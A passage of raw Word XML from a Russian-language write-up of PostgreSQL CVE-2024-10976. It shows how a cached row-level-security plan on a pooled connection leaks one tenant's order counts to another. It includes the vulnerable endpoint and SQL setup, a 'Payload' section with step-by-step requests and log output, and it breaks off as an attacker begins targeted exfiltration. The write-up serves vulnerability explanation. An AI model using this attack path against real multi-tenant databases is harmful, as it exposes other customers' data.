        </w:rPr>
        <w:t xml:space="preserve">            # ↑ Connection возвращается в pool с RESET ROLE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            # ↑ Plan-cache на connection сохраняется!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/orders.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/orders/dashboard")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_dashboard(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_role: str = Depends(get_tenant_role_from_jwt),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async with tenant_session(tenant_role) as session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Этот SQL содержит subquery на RLS-таблицу</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session.execute(text("""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            SELECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                (SELECT count(*) FROM app.orders WHERE status = 'pending') AS pending_count,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                (SELECT count(*) FROM app.orders WHERE status = 'completed') AS completed_count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dict(result.first()._mapping)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Setup БД:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE app.orders (id int, tenant_id int, status text, amount numeric);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE app.orders ENABLE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CREATE POLICY tenant_isolation ON app.orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('jwt.tenant_id')::int);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Роли — по одной per tenant:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE tenant_42;  -- tenant_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE tenant_99;  -- tenant_id = 99</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT ON app.orders TO tenant_42, tenant_99;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection pool re-uses connection между запросами разных tenants. Subquery в SELECT-list — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">rule expansion / RLS planning path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, где CVE-2024-10976 hit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — cross-tenant data leak через plan-cache reuse</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 атакующий (tenant 42) делает первый запрос:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /orders/dashboard (с JWT tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection pool выдаёт connection C, делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_42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jwt.tenant_id = '42'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PostgreSQL парсит SQL, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">строит plan с RLS-фильтром для tenant_42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WHERE tenant_id = 42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Plan-cache сохраняет plan для этой query (с включёнными RLS-фильтрами для роли tenant_42). Response: counts по orders с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id = 42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает connection в pool — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plan-cache на этом connection сохранён</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 другой пользователь (tenant 99) делает запрос:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /orders/dashboard (с JWT tenant_99)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection pool выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">тот же connection C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или другой — но pool обычно reuse). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_99</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jwt.tenant_id = '99'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">берёт plan из cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для совпадающей query — этот plan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">содержит RLS-фильтр для tenant_42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (из Шага 1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Subquery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT count(*) FROM app.orders WHERE status = 'pending'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cached RLS expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — что означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE tenant_id = 42 AND status = 'pending'</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WHERE tenant_id = 99 AND status = 'pending'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Response: tenant_99 видит counts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_42</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auto_explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для diagnosis):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LOG:  execute &lt;unnamed&gt;: SELECT (SELECT count(*) FROM app.orders WHERE status = 'pending') AS pending_count, ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DETAIL:  Plan: ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         Subquery scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            -&gt;  Aggregate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                  -&gt;  Seq Scan on orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        Filter: ((tenant_id = 42) AND (status = 'pending'::text))  -- ↑ из cached plan!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        -- но executed под current_user = tenant_99</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий-tenant 42 (если он же делает enumeration):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы целенаправленно exfiltrate данные tenant 99, атакующий с правами tenant_42 организует:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># атакующий tenant_42 имеет login как tenant_42 (его обычная сессия)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
